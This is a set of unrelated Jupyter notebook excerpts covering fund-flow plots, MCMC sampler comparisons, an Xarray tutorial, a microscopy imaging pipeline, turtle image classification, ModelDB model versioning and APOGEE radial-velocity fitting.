= 
net_flow.sum(axis=1) total.name = "Total" show(net_flow, total, ta=False, log=False, title="Cumulative Net Flow") ``` ## סך נכסים מנוהלים וצבירה נטו בקרנות השתלמות במסלול כללי ``` aums = list(map(getAum, allKranotIDs)) flowSums = list(map(getFlowSum, allKranotIDs)) aums = [s for s in aums if "כללי" in s.name] aums = [s for s in aums if not " ** " in s.name] # exclude exclusive funds for specific sectors flowSums = [s for s in flowSums if "כללי" in s.name] flowSums = [s for s in flowSums if not " ** " in s.name] # exclude exclusive funds for specific sectors show(aums, ta=False, legend=False) show(flowSums, ta=False, legend=False) ``` ## סך נכסים מנוהלים וצבירה נטו ותשואה בקרן ספציפית ``` id = 1377 flowsum = getFlowSum(id) aum = getAum(id) gains = getKeren(id) show(aum , flowsum, gains, ta=True) # be sure to save before you publish # when done, you will get a public link to an HTML file with the results publish() ```
github_jupyter
$$ p(\theta|0) = \frac{1}{\sqrt{2\pi\frac{100}{26}}} \exp\left(-\frac{13\theta^2}{100}\right)$$
title="PyMC3") ``` # PyStan ``` stan_code = """ data { real y; } parameters { real theta; } model { theta ~ normal(0, 10); y ~ normal(theta, 2); } """ stan_model = pystan.StanModel(model_code=stan_code) fit = stan_model.sampling(data={"y": 0}, chains=4, iter=10**6, warmup=300000) idata_pystan = az.from_pystan(fit) idata_pystan.to_netcdf("pystan_post_autocorr.nc") idata_pystan = az.from_netcdf("pystan_post_autocorr.nc") ``` ### Chain average ``` idxs, ess_samples = ess_evolution(idata_pystan.posterior.theta.values) plot_ess_evolution(idata_pystan.posterior.theta.values, idxs, ess_samples, title="PyStan") ``` # emcee ``` def lnprob(theta): return -13 * theta**2 / 100 nwalkers = 6 ndim = 1 draws = 701000 pos = np.random.normal(size=(nwalkers, ndim)) sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob) sampler.run_mcmc(pos, draws, progress=True); idata_emcee = az.from_emcee(sampler, var_names=["theta"]) idata_emcee.sel(draw=slice(1000, None)) idata_emcee.to_netcdf("emcee_post_autocorr.nc") idata_emcee = az.from_netcdf("emcee_post_autocorr.nc") ``` ### Chain average ``` idxs, ess_samples = ess_evolution(idata_emcee.posterior.theta.values) plot_ess_evolution(idata_emcee.posterior.theta.values, idxs, ess_samples, title="emcee") ``` ## Check all samplers got the same posterior ``` az.plot_density([idata_emcee, idata_pystan, idata_pymc3]) ```
github_jupyter
## Jupyter Notebooks - this document is called an: *Interactive Python Notebook* (or Notebook for short) Notebooks are documents (files) made up of a sequence of *cells* that contain either code (python in our case) or documentation (text, or formatted text called *markdown*).
Since our Binder environment will disappear when we are no longer using it, we need to cause our new version to be saved somewhere permanent. Luckily we have a GitHub repository already connected to our current environment - however there are a couple of steps required to make our GitHub repository match the copy of the repository inside our Binder environment.
github_jupyter
Similar to `numpy`, `np`; `pandas`, `pd`; you may often encounter `xarray` imported within a shortened namespace as `xr`.
Xarray expands on the capabilities of NumPy arrays, providing a lot of streamlined data manipulation.
Notice what happens if we perform a mathematical operation with the `DataArray`: the coordinate values persist, but the attributes are lost.
To illustrate this, we'll do a simple unit conversion from Kelvin to Celsius: ``` temp_in_celsius = temp - 273.15 temp_in_celsius ``` For an in-depth discussion of how Xarray handles metadata, start in the Xarray docs [here](http://xarray.pydata.org/en/stable/getting-started-guide/faq.html#approach-to-metadata). ### The `Dataset`: a container for `DataArray`s with shared coordinates Along with `DataArray`, the other key object type in Xarray is the `Dataset`: a dictionary-like container that holds one or more `DataArray`s, which can also optionally share coordinates (see docs [here](http://xarray.pydata.org/en/stable/user-guide/data-structures.html#dataset)). The most common way to create a `Dataset` object is to load data from a file (see [below](#Opening-netCDF-data)). Here, instead, we will create another `DataArray` and combine it with our `temp` data. This will illustrate how the information about common coordinate axes is used. #### Create a pressure `DataArray` using the same coordinates This code mirrors how we created the `temp` object above. ``` pressure_data = 1000.0 + 5 * np.random.randn(5, 3, 4) pressure = xr.DataArray( pressure_data, coords=[times, lats, lons], dims=['time', 'lat', 'lon'] ) pressure.attrs['units'] = 'hPa' pressure.attrs['standard_name'] = 'air_pressure' pressure ``` #### Create a `Dataset` object Each `DataArray` in our `Dataset` needs a name! The most straightforward way to create a `Dataset` with our `temp` and `pressure` arrays is to pass a dictionary using the keyword argument `data_vars`: ``` ds = xr.Dataset(data_vars={'Temperature': temp, 'Pressure': pressure}) ds ``` Notice that the `Dataset` object `ds` is aware that both data arrays sit on the same coordinate axes. #### Access Data variables and Coordinates in a `Dataset` We can pull out any of the individual `DataArray` objects in a few different ways. Using the "dot" notation: ``` ds.Pressure ``` ... 
or using dictionary access like this: ``` ds['Pressure'] ``` We'll return to the `Dataset` object when we start loading data from files. ## Subsetting and selection by coordinate values Much of the power of labeled coordinates comes from the ability to select data based on coordinate names and values, rather than array indices. We'll explore this briefly here. ### NumPy-like selection Suppose we want to extract all the spatial data for one single date: January 2, 2018. It's possible to achieve that with NumPy-like index selection: ``` indexed_selection = temp[1, :, :] # Index 1 along axis 0 is the time slice we want... indexed_selection ``` HOWEVER, notice that this requires us (the user / programmer) to have **detailed knowledge** of the order of the axes and the meaning of the indices along those axes! _**Named coordinates free us from this burden...**_ ### Selecting with `.sel()` We can instead select data based on coordinate values using the `.sel()` method, which takes one or more named coordinate(s) as keyword argument: ``` named_selection = temp.sel(time='2018-01-02') named_selection ``` We got the same result, but - we didn't have to know anything about how the array was created or stored - our code is agnostic about how many dimensions we are dealing with - the intended meaning of our code is much clearer! ### Approximate selection and interpolation With time and space data, we frequently want to sample "near" the coordinate points in our dataset. Here are a few simple ways to achieve that. #### Nearest-neighbor sampling Suppose we want to sample the nearest datapoint within 2 days of date `2018-01-07`. Since the last day on our `time` axis is `2018-01-05`, this is well-posed. `.sel` has the flexibility to perform nearest neighbor sampling, taking an optional tolerance: ``` temp.sel(time='2018-01-07', method='nearest', tolerance=timedelta(days=2)) ``` where we see that `.sel` indeed pulled out the data for date `2018-01-05`. 
#### Interpolation Suppose we want to extract a timeseries for Boulder (40°N, 105°W). Since `lon=-105` is _not_ a point on our longitude axis, this requires interpolation between data points. The `.interp()` method (see the docs [here](http://xarray.pydata.org/en/stable/interpolation.html)) works similarly to `.sel()`. Using `.interp()`, we can interpolate to any latitude/longitude location: ``` temp.interp(lon=-105, lat=40) ``` <div class="admonition alert alert-info"> <p class="admonition-title" style="font-weight:bold">Info</p> Xarray's interpolation functionality requires the <a href="https://scipy.org/">SciPy</a> package! </div> ### Slicing along coordinates Frequently we want to select a range (or _slice_) along one or more coordinate(s). We can achieve this by passing a Python [slice](https://docs.python.org/3/library/functions.html#slice) object to `.sel()`, as follows: ``` temp.sel( time=slice('2018-01-01', '2018-01-03'), lon=slice(-110, -70), lat=slice(25, 45) ) ``` <div class="admonition alert alert-info"> <p class="admonition-title" style="font-weight:bold">Info</p> The calling sequence for <code>slice</code> always looks like <code>slice(start, stop[, step])</code>, where <code>step</code> is optional. </div> Notice how the length of each coordinate axis has changed due to our slicing. ### One more selection method: `.loc` All of these operations can also be done within square brackets on the `.loc` attribute of the `DataArray`: ``` temp.loc['2018-01-02'] ``` This is sort of in between the NumPy-style selection ``` temp[1,:,:] ``` and the fully label-based selection using `.sel()` With `.loc`, we make use of the coordinate *values*, but lose the ability to specify the *names* of the various dimensions. Instead, the slicing must be done in the correct order: ``` temp.loc['2018-01-01':'2018-01-03', 25:45, -110:-70] ``` One advantage of using `.loc` is that we can use NumPy-style slice notation like `25:45`, rather than the more verbose `slice(25,45)`. 
But of course that also works: ``` temp.loc['2018-01-01':'2018-01-03', slice(25, 45), -110:-70] ``` What *doesn't* work is passing the slices in a different order: ``` # This will generate an error # temp.loc[-110:-70, 25:45,'2018-01-01':'2018-01-03'] ``` ## Opening netCDF data With its close ties to the netCDF data model, Xarray also supports netCDF as a first-class file format. This means it has easy support for opening netCDF datasets, so long as they conform to some of Xarray's limitations (such as 1-dimensional coordinates). ### Access netCDF data with `xr.open_dataset` <div class="admonition alert alert-info"> <p class="admonition-title" style="font-weight:bold">Info</p> Here we're getting the data from Project Pythia's custom library of example data, which we already imported above with <code>from pythia_datasets import DATASETS</code>. The <code>DATASETS.fetch()</code> method will automatically download and cache our example data file <code>NARR_19930313_0000.nc</code> locally. </div> ``` filepath = DATASETS.fetch('NARR_19930313_0000.nc') ``` Once we have a valid path to a data file that Xarray knows how to read, we can open it like this: ``` ds = xr.open_dataset(filepath) ds ``` ### Subsetting the `Dataset` Our call to `xr.open_dataset()` above returned a `Dataset` object that we've decided to call `ds`. 
We can then pull out individual fields: ``` ds.isobaric1 ``` (recall that we can also use dictionary syntax like `ds['isobaric1']` to do the same thing) `Dataset`s also support much of the same subsetting operations as `DataArray`, but will perform the operation on all data: ``` ds_1000 = ds.sel(isobaric1=1000.0) ds_1000 ``` And further subsetting to a single `DataArray`: ``` ds_1000.Temperature_isobaric ``` ### Aggregation operations Not only can you use the named dimensions for manual slicing and indexing of data, but you can also use it to control aggregation operations, like `std` (standard deviation): ``` u_winds = ds['u-component_of_wind_isobaric'] u_winds.std(dim=['x', 'y']) ``` <div class="admonition alert alert-info"> <p class="admonition-title" style="font-weight:bold">Info</p> Aggregation methods for Xarray objects operate over the named coordinate dimension(s) specified by keyword argument <code>dim</code>. Compare to NumPy, where aggregations operate over specified numbered <code>axes</code>. </div> Using the sample dataset, we can calculate the mean temperature profile (temperature as a function of pressure) over Colorado within this dataset. For this exercise, consider the bounds of Colorado to be: * x: -182km to 424km * y: -1450km to -990km (37°N to 41°N and 102°W to 109°W projected to Lambert Conformal projection coordinates) ``` temps = ds.Temperature_isobaric co_temps = temps.sel(x=slice(-182, 424), y=slice(-1450, -990)) prof = co_temps.mean(dim=['x', 'y']) prof ``` ## Plotting with Xarray Another major benefit of using labeled data structures is that they enable automated plotting with sensible axis labels. ### Simple visualization with `.plot()` Much like we saw in [Pandas](../pandas/pandas), Xarray includes an interface to [Matplotlib](../matplotlib) that we can access through the `.plot()` method of every `DataArray`. 
For quick and easy data exploration, we can just call `.plot()` without any modifiers: ``` prof.plot() ``` Here Xarray has generated a line plot of the temperature data against the coordinate variable `isobaric`. Also the metadata are used to auto-generate axis labels and units. ### Customizing the plot As in Pandas, the `.plot()` method is mostly just a wrapper to Matplotlib, so we can customize our plot in familiar ways. In this air temperature profile example, we would like to make two changes: - swap the axes so that we have isobaric levels on the y (vertical) axis of the figure - make pressure decrease upward in the figure, so that up is up A few keyword arguments to our `.plot()` call will take care of this: ``` prof.plot(y="isobaric1", yincrease=False) ``` ### Plotting 2D data In the example above, the `.plot()` method produced a line plot. What if we call `.plot()` on a 2D array? ``` temps.sel(isobaric1=1000).plot() ``` Xarray has recognized that the `DataArray` object calling the plot method has two coordinate variables, and generates a 2D plot using the `pcolormesh` method from Matplotlib. In this case, we are looking at air temperatures on the 1000 hPa isobaric surface over North America. We could of course improve this figure by using [Cartopy](../cartopy) to handle the map projection and geographic features! --- ## Summary Xarray brings the joy of Pandas-style labeled data operations to N-dimensional data. As such, it has become a central workhorse in the geoscience community for the analysis of gridded datasets. Xarray allows us to open self-describing NetCDF files and make full use of the coordinate axes, labels, units, and other metadata. By making use of labeled coordinates, our code is often easier to write, easier to read, and more robust. ### What's next? 
Additional notebooks to appear in this section will go into more detail about

- arithmetic and broadcasting with Xarray data structures
- using "group by" operations
- remote data access with OpenDAP
- more advanced visualization including map integration with Cartopy

## Resources and references

This notebook was adapted from material in [Unidata's Python Training](https://unidata.github.io/python-training/workshop/XArray/xarray-and-cf/).

The best resource for Xarray is the [Xarray documentation](http://xarray.pydata.org/en/stable/). See in particular

- [Why Xarray](http://xarray.pydata.org/en/stable/getting-started-guide/why-xarray.html)
- [Quick overview](http://xarray.pydata.org/en/stable/getting-started-guide/quick-overview.html#)
- [Example gallery](http://xarray.pydata.org/en/stable/gallery.html)

Another excellent resource is this [Xarray Tutorial collection](https://xarray-contrib.github.io/xarray-tutorial/).
github_jupyter
__Author:__ Bogdan Bintu

__Email:__ bbintu@g.harvard.edu

__Date:__ 3/4/2020

#### Note: This assumes Python 2

```
# Imports
import numpy as np
import glob,os,sys
import matplotlib.pylab as plt
import workers #worker package to parallelize
#Warning: Installing ipyparallel is recommended
```

### 1. Raw imaging data structure description

This code assumes the data is stored in a __master_folder__ with subfolders organized by rounds of hybridization i.e.:

__H1R1,R2__ - corresponds to the 1st round of imaging the fluorescent signal in which readout 1 is imaged in the first color channel, readout 2 is imaged in the second color channel and fiducial beads are imaged in the third color channel. For each z-position the three color channels are imaged, the z-piezo is moved one step (100-250nm) and then the imaging of the three color channels is repeated etc. This folder contains multiple .dax imaging files (and associated info files) organized per field of view (i.e. Conv_zscan_00.dax corresponds to the 1st field of view, Conv_zscan_01.dax corresponds to the 2nd field of view etc.).

__H2R3,R4__ - corresponds to the 2nd round of imaging the fluorescent signal in which readout 3 is imaged in the first color channel, readout 4 is imaged in the second color channel and fiducial beads are imaged in the third color channel. The z-step imaging and file format within each folder follow the same description above for each folder unless specified.

...

__H0B,B__ - corresponds to the first round of imaging, before flowing readout sequences (typically across all 5 available color channels in an alternating fashion) (B - indicates that there is no fluorescent signal in that channel)

...
__H1Q1,Q2,Q3__ - correpsonds to the 1nd round of imaging the fluorsecent signal of RNA (Q-denotes RNA readouts) in which RNA readout 1 is imaged in the first color channel, RNA readout 2 is imaged in the second color channel, RNA readout 3 is imaged in the third color channel and fiducial beads are imaged in the fourth color chanel. ### 2. Organize the data and flatten the illumination profile ``` ######### Get the info for the current project master_folder=r'master_DNA_folder' hfolders = [folder for folder in glob.glob(master_folder+os.sep+'*') if os.path.isdir(folder) and glob.glob(folder+os.sep+'*.dax')>0 and os.path.basename(folder)[0]!='F'] hinds = [workers.getH(hfolder) for hfolder in hfolders] hfolders = np.array(hfolders)[np.argsort(hinds)] fovs = map(os.path.basename,glob.glob(hfolders[0]+os.sep+'*.dax')) analysis_folder = master_folder+'-Analysis' if not os.path.exists(analysis_folder): os.makedirs(analysis_folder) ######### compute the median value across all fields of view - this helps flatten the illumination num_cols,remove_first = 4,0 hfolder = hfolders[10] print hfolder meds_fl = analysis_folder+os.sep+'im_meds.npy' if not os.path.exists(meds_fl): im_meds = [np.mean([workers.get_frame(hfolder+os.sep+fov,ind_z=ind_col+remove_first) for fov in fovs],axis=0) for ind_col in range(num_cols)] np.save(meds_fl,np.array(im_meds,dtype=np.float32)) #### check illumination profile im_med = np.load(meds_fl) plt.figure(figsize=(5,5)) im = im_med[3] plt.imshow(im,vmax=np.percentile(im,95)*1.2) plt.colorbar() ``` ### 3. 
Run the rough alignment and fiducial drift fitting across all fields of view and all imaging rounds

```
def ref_fl(dax_fl,ref_tags = ['H20B,B','H20B,B']):
    """Return the reference (fiducial-bead) .dax file matching *dax_fl*.

    RNA rounds (folder tag containing 'Q') use ref_tags[-1]; all other
    rounds use ref_tags[0].
    NOTE(review): both default tags are currently identical ('H20B,B') --
    confirm that is intentional.
    """
    htag = os.path.basename(os.path.dirname(dax_fl))  # hybridization folder tag
    fov = os.path.basename(dax_fl)  # field-of-view file name
    ref_tag = ref_tags[-1] if 'Q' in htag else ref_tags[0]
    # First hybridization folder whose name contains the reference tag.
    ref_hfolder = [hfolder for hfolder in hfolders if ref_tag in os.path.basename(hfolder)][0]
    dax_fl_ref = ref_hfolder+os.sep+fov
    return dax_fl_ref

# Build one (data file, reference file, overwrite flags) task tuple per
# field of view and imaging round.
paramaters = []
overwrite_fits,overwrite_drift=False,False
for fovind in range(len(fovs)):
    for hind in range(len(hfolders)):
        htag = os.path.basename(hfolders[hind])
        dax_fl = hfolders[hind]+os.sep+fovs[fovind]
        ref_dax_fl = ref_fl(dax_fl)
        paramaters.append((dax_fl,ref_dax_fl,overwrite_fits,overwrite_drift))
print len(paramaters)
```

#### Run across all data in parallel

```
#Run the workers in parallel to perform rough registration and fit the beads in the data.
# while workers can also perform rough (yet fast) fitting of the signal data,
#this is mostly used for testing as the gaussian fitting is more precise
#Add path to the system to be able to import
#Open terminal and run: ipcluster start -n 20
import ipyparallel as ipp
from ipyparallel import Client
rc = Client()
import workers
reload(workers)
def f(parm):
    """Worker task: run the fitting analysis for one (data, reference) pair."""
    import sys
    # Make the analysis code importable on each remote engine.
    sys.path.append(r'E:\Bogdan\Dropbox\code_Seurat\WholeGenome_MERFISH\Analysis_code')
    import workers
    reload(workers)
    success = workers.run_fitting_analysis(parm,remove_first=0,im_pad=0,fit_colors=False)
    return success
res = rc[:].map_sync(f,paramaters[:])
```

#### Example of single run output

```
f(paramaters[3000])
```
github_jupyter
# Turtle Recall A facial recognition model for turtles https://zindi.africa/competitions/turtle-recall-conservation-challenge/data # Imports ``` import tensorflow as tf import pandas as pd import numpy as np import matplotlib.pyplot as plt import os import datetime import tqdm from PIL import Image print(f'TensorFlow version is {tf.__version__}') physical_devices = tf.config.list_physical_devices('GPU') print("Num GPUs:", len(physical_devices)) %load_ext tensorboard ``` # Dataset First, we load the data. In addition to the turtles and images from the train.csv file, we also make use of extra_images.csv by concatenation with the train file. This yields substantially more (ca. 10.000) image files to later train the model on. ``` train = pd.read_csv("./data/train.csv") extra_images = pd.read_csv("./data/extra_images.csv") # Convert image_location strings to lowercase. for row in [train]: row.image_location = row.image_location.apply(lambda x: x.lower()) assert set(row.image_location.unique()) == set(['left', 'right', 'top']) df = pd.concat(objs=[train, extra_images]) images_per_turtle = pd.value_counts(df.turtle_id) print(f'The total number of turtles is {len(df.turtle_id.unique())}.\n' 'The mean number of training images per turtle is ' f'{round(np.mean(images_per_turtle), 2)}, ' f'and the median is {int(np.median(images_per_turtle))}.') ``` As we can see, however, we don't get a lot of images per turtle on average. Actually, some 2000 turtles are represented with less than 10 images in the dataset, which leads to a huge imbalance. Hence, we decide not to make use of any turtle with less than `MIN_NR_IMGS`. 
``` from utils import MIN_NR_IMGS im_per_turtle = images_per_turtle[images_per_turtle >= MIN_NR_IMGS].to_frame() df = df[df.turtle_id.isin(im_per_turtle.index)].reset_index() images_per_turtle = pd.value_counts(df.turtle_id) print(f'The total number of turtles after removal is {len(df.turtle_id.unique())}.\n' 'The mean number of training images per turtle is now ' f'{round(np.mean(images_per_turtle), 2)}, ' f'and the median is {int(np.median(images_per_turtle))}. \n' f'The smallest number of images per turtle is ' f'{min(df.turtle_id.value_counts())}.') print(df.shape) df.head(3) ``` We have now removed a significant portion of the data and are left with about 5000 images, which is still more than double the amount of the initial images in the `train.csv`. There is, however, still a huge imbalance in the dataset and the total number of files is quite small. ``` plt.hist(x=images_per_turtle, rwidth=0.9, bins=20) plt.xlabel('Images per turtle', fontfamily='serif', bbox=dict(facecolor='none', edgecolor='black')) plt.xticks(fontfamily='serif') plt.yticks(fontfamily='serif') #plt.savefig('images_per_turtle.png') plt.show() ``` # Preprocessing We create mappings and get the paths to the image files. After that follows some basic and some advanced preprocessing. 
```
from utils import IMAGE_DIR

# Map every turtle id to an integer class label; 'new_turtle' is an extra
# class reserved for individuals not present in the training data.
turtle_ids = sorted(np.unique(df.turtle_id)) + ['new_turtle']
# Image files on disk whose id appears in the (filtered) dataframe.
image_files = [os.path.join(IMAGE_DIR, f) for f in os.listdir(IMAGE_DIR)
               if f.split('.')[0] in df.image_id.values]
image_ids = [os.path.basename(f).split('.')[0] for f in image_files]
image_to_turtle = dict(zip(df.image_id, df.turtle_id))
labels = dict(zip(turtle_ids, np.arange(len(turtle_ids))))
# Integer class label for each loaded image, in image_files order.
loaded_labels = [labels[image_to_turtle[id]] for id in image_ids]

NUM_CLASSES = len(turtle_ids)
print(f'Number of turtles (classes): {NUM_CLASSES}')

from utils import IMAGE_SIZE

def crop_and_resize(pil_img, img_size=IMAGE_SIZE):
    """Crop square from center of image and resize."""
    w, h = pil_img.size
    crop_size = min(w, h)
    # Centered square crop box: (left, upper, right, lower).
    crop = pil_img.crop(((w - crop_size) // 2,
                         (h - crop_size) // 2,
                         (w + crop_size) // 2,
                         (h + crop_size) // 2))
    return crop.resize(img_size)

tqdm.tqdm._instances.clear()  # clear stale progress bars from earlier cell runs
loaded_images = [crop_and_resize(Image.open(f)) for f in tqdm.tqdm(image_files)]

# inspect an image
print(loaded_images[0].size)
print(len(loaded_images))
loaded_images[0]

ims = tf.stack([tf.convert_to_tensor(np.asarray(im), dtype=tf.float32) for im in loaded_images])
# NOTE(review): `labels` (the id->index dict above) is shadowed here by the
# tensor of per-image labels -- consider a distinct name.
labels = tf.stack(loaded_labels)
train_ds = tf.data.Dataset.from_tensor_slices((ims, labels))
# Scale pixel values to [0, 1] and one-hot encode the integer class labels.
train_ds = train_ds.map(lambda x,y: (x/255., tf.one_hot(y, NUM_CLASSES)))
print(f'The dataset contains {train_ds.cardinality().numpy()} images.')
```

### Data augmentation

https://colab.research.google.com/github/tensorflow/addons/blob/master/docs/tutorials/image_ops.ipynb#scrollTo=tbaIkUCS2eNv

Before applying augmentation to our images and hence increasing the size of our training data, we shuffle the current dataset, take a few images and store them in a test set for eventually evaluating our model. We do this to preserve the real-world data we want our model to work on later.
The augmentation is then only used on training and validation data to make sure our model learns with a variety of different images and is robust against noise, different colour and brightness values, etc. ``` BUFFER = train_ds.cardinality().numpy() TEST_SPLIT = 1000 #ds = ds.shuffle(buffer_size=BUFFER, reshuffle_each_iteration=False, ) test_ds, train_ds = train_ds.take(TEST_SPLIT), train_ds.skip(TEST_SPLIT) print( f'Train images: {train_ds.cardinality().numpy()}', f'Test images: {test_ds.cardinality().numpy()}', sep='\n') ``` We implemented a bunch of augmentation functions to enhance the small dataset. After applying them, we further split off a validation part from the training images which we can use during the training process to assess the progress. We then simply shuffle and batch each dataset, prefetch a few batches, and cache the datasets. ``` from functions.image_augmentation import rotate_images, apply_mean_filter, apply_gaussian_filter, random_hsv, add_noise ds_rotated = rotate_images(train_ds) ds_gaussian = apply_gaussian_filter(train_ds) ds_hsv = random_hsv(train_ds) ds_noise = add_noise(train_ds, 0.2) train_ds = train_ds.concatenate(ds_rotated).concatenate(ds_gaussian).concatenate(ds_hsv).concatenate(ds_noise) from utils import BATCH_SIZE TRAIN_SPLIT = np.round(train_ds.cardinality().numpy() * 0.8) train_ds, val_ds = train_ds.take(TRAIN_SPLIT), train_ds.skip(TRAIN_SPLIT) train_ds = train_ds.shuffle(512).batch(BATCH_SIZE, drop_remainder=True).prefetch(tf.data.experimental.AUTOTUNE) train_ds = train_ds.cache(filename='cached_train_ds') val_ds = val_ds.shuffle(256).batch(BATCH_SIZE, drop_remainder=True).prefetch(tf.data.experimental.AUTOTUNE) val_ds = val_ds.cache(filename='cached_val_ds') test_ds = test_ds.shuffle(256).batch(BATCH_SIZE, drop_remainder=True).prefetch(tf.data.experimental.AUTOTUNE) test_ds = test_ds.cache(filename='cached_test_ds') print( f'Training dataset contains {train_ds.cardinality().numpy() * BATCH_SIZE} images after data 
augmentation.', f'Validation dataset contains {val_ds.cardinality().numpy() * BATCH_SIZE} images.', sep='\n') ``` # Training ``` from utils import NR_EPOCHS tf.keras.backend.clear_session() ``` ## AlexNet A simple AlexNet as described in Krizhevsky et al., 2012. ``` from models.alexNet import create_compiled_alexnet alexNet = create_compiled_alexnet() alexNet.summary() # Preparing and opening a tensorboard instance to observe training log_dir = 'logs/alexNet/' + datetime.datetime.now().strftime('%Y%m%d-%H%M%S') tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1) %tensorboard --logdir=logs alexNet.fit( train_ds, epochs=NR_EPOCHS, validation_data=val_ds, callbacks=[tensorboard_callback]) alexNet.evaluate( test_ds, callbacks=tensorboard_callback, return_dict=True) ``` ## EfficientNetV2 For comparison, we bring in a pre-trained EfficientNetV2-B0 as per Tan and Le (2021). ``` from models.efficientNetV2 import create_compiled_EfficientNetV2 efficientNet = create_compiled_EfficientNetV2(trainable=True) efficientNet.summary() log_dir = 'logs/efficientNet/' + datetime.datetime.now().strftime('%Y%m%d-%H%M%S') tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1) %tensorboard --logdir=logs efficientNet.fit( train_ds, epochs=NR_EPOCHS, validation_data=val_ds, callbacks=[tensorboard_callback]) efficientNet.evaluate( test_ds, callbacks=tensorboard_callback, return_dict=True) ``` ## InceptionV3 ``` from models.inceptionV3 import create_compiled_inceptionV3 inception = create_compiled_inceptionV3(trainable=True) inception.summary() log_dir = 'logs/inception/' + datetime.datetime.now().strftime('%Y%m%d-%H%M%S') tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1) %tensorboard --logdir=logs inception.fit( train_ds, epochs=30, validation_data=val_ds, callbacks=[tensorboard_callback]) inception.evaluate( test_ds, callbacks=tensorboard_callback, return_dict=True) ```
github_jupyter
# Versioning Example (Part 2/3)

In part 1, we trained and logged a tweet sentiment classifier using ModelDB's versioning system. Now we'll see how that can come in handy when we need to revisit or even revert changes we make.

This workflow requires ``verta>=0.14.4`` and ``spaCy>=2.0.0``.

---

# Setup

As before, import libraries we'll need...

```
from __future__ import unicode_literals, print_function

import boto3
import json
import numpy as np
import pandas as pd
import spacy
```

...and instantiate Verta's ModelDB Client.

```
from verta import Client

client = Client('http://localhost:3000/')
proj = client.set_project('Tweet Classification')
expt = client.set_experiment('SpaCy')
```

---

# Prepare Data

This time, things are a little different. Let's say someone has provided us with a new, experimental dataset that supposedly will improve our model. Unbeknownst to everyone, this dataset actually only contains *one* of the two classes we're interested in. This is going to hurt our performance, but we don't know it yet.

Before, we trained a model on `english-tweets.csv`. Now, we're going to train with **`positive-english-tweets.csv`**.

```
S3_BUCKET = "verta-starter"
S3_KEY = "positive-english-tweets.csv"
FILENAME = S3_KEY

boto3.client('s3').download_file(S3_BUCKET, S3_KEY, FILENAME)

import utils

data = pd.read_csv(FILENAME).sample(frac=1).reset_index(drop=True)
utils.clean_data(data)
data.head()
```

---

# Capture and Version Model Ingredients

As with before, we'll capture and log our model ingredients directly onto our repository's `master` branch.
``` from verta.code import Notebook from verta.configuration import Hyperparameters from verta.dataset import S3 from verta.environment import Python code_ver = Notebook() # Notebook & git environment config_ver = Hyperparameters({'n_iter': 20}) dataset_ver = S3("s3://{}/{}".format(S3_BUCKET, S3_KEY)) env_ver = Python(Python.read_pip_environment()) # pip environment and Python version repo = client.set_repository('Tweet Classification') commit = repo.get_commit(branch='master') commit.update("notebooks/tweet-analysis", code_ver) commit.update("config/hyperparams", config_ver) commit.update("data/tweets", dataset_ver) commit.update("env/python", env_ver) commit.save("Update tweet dataset") commit ``` You may verify through [the Web App](http://localhost:3000/) that this commit updates the dataset, as well as the Notebook. --- # Train and Log Model Again as before, we'll train the model and log it along with the commit to an Experiment Run. ``` nlp = spacy.load('en_core_web_sm') import training training.train(nlp, data, n_iter=20) run = client.set_experiment_run() run.log_model(nlp) run.log_commit( commit, { 'notebook': "notebooks/tweet-analysis", 'hyperparameters': "config/hyperparams", 'training_data': "data/tweets", 'python_env': "env/python", }, ) ``` --- # Revert Commit Looking back over our workflow, we might notice that there's something suspicious about the model's precision, recall, and F-score. This model isn't performing as it should, and we don't want it to be the latest commit in `master`. Using the Client, we'll revert the commit. ``` commit commit.revert() commit ``` As easy as that—we have a new commit on `master` that reverted our grave mistake. Again, [the Web App](http://localhost:3000/) will show that the change from `english-tweets.csv` to `positive-english-tweets.csv` has been undone. ---
github_jupyter
``` import os # Third-party from astropy.io import fits import astropy.time as atime import astropy.units as u import matplotlib.pyplot as plt import numpy as np plt.style.use('apw-notebook') %matplotlib inline from ebak.singleline import RVData, OrbitModel from ebak.units import usys from ebak import SimulatedRVOrbit PLOT_PATH = "../plots/troup-fits" if not os.path.exists(PLOT_PATH): os.mkdir(PLOT_PATH) troup = np.genfromtxt("../data/troup16-dr12.csv", delimiter=",", names=True, dtype=None) allVisit = fits.getdata("../data/allVisit-l30e.2.fits", 1) v_err_max = np.nanmax(np.vstack((allVisit['VRELERR'], allVisit['ESTVRELERR'], allVisit['SYNTHVRELERR'])), axis=0) bins = np.logspace(-3,1,16) #plt.hist(v_err_max, bins=bins) for _verr in [allVisit['VRELERR'], allVisit['ESTVRELERR'], allVisit['SYNTHVRELERR']]: plt.hist(_verr[np.isfinite(_verr)], bins=bins, alpha=0.2) plt.xscale('log') plt.xlabel(r'$\sigma_{rv}$ [km/s]') plt.plot(allVisit['J'], allVisit['VRELERR'], ls='none', alpha=0.4, marker=',') plt.yscale('log') plt.xlim(2, 20) plt.ylim(1E-3, 1E1) plt.xlabel('$J$ [mag]') plt.ylabel(r'$\sigma_{rv}$ [km/s]') # Make the same panels as Figure 5 in Troup+2016 troup_ids = ['2M00283971+8530377', '2M13131777+1705326', '2M03080601+7950502'] data_style = dict(marker='o', ecolor='#666666', linestyle='none', alpha=0.75, color='k', label='APOGEE data') model_style = dict(marker=None, linestyle='-', color='#de2d26', alpha=0.6, label='Troup orbit') for apogee_id in troup_ids: fig,ax = plt.subplots(1,1,figsize=(8,6)) target = allVisit[allVisit['APOGEE_ID'].astype(str) == apogee_id] troup_row = troup[troup['APOGEE_ID'].astype(str) == apogee_id] # get APOGEE data for RV measurements data_t = atime.Time(target['JD'], format='jd') # TODO: is this Barycentric? , scale='tcb' data_rv = np.array(target['VHELIO']) * u.km/u.s data_rv_err = (np.array(target['VRELERR'])*u.km/u.s)**2 # TODO: is this the correct uncertainty to use? 
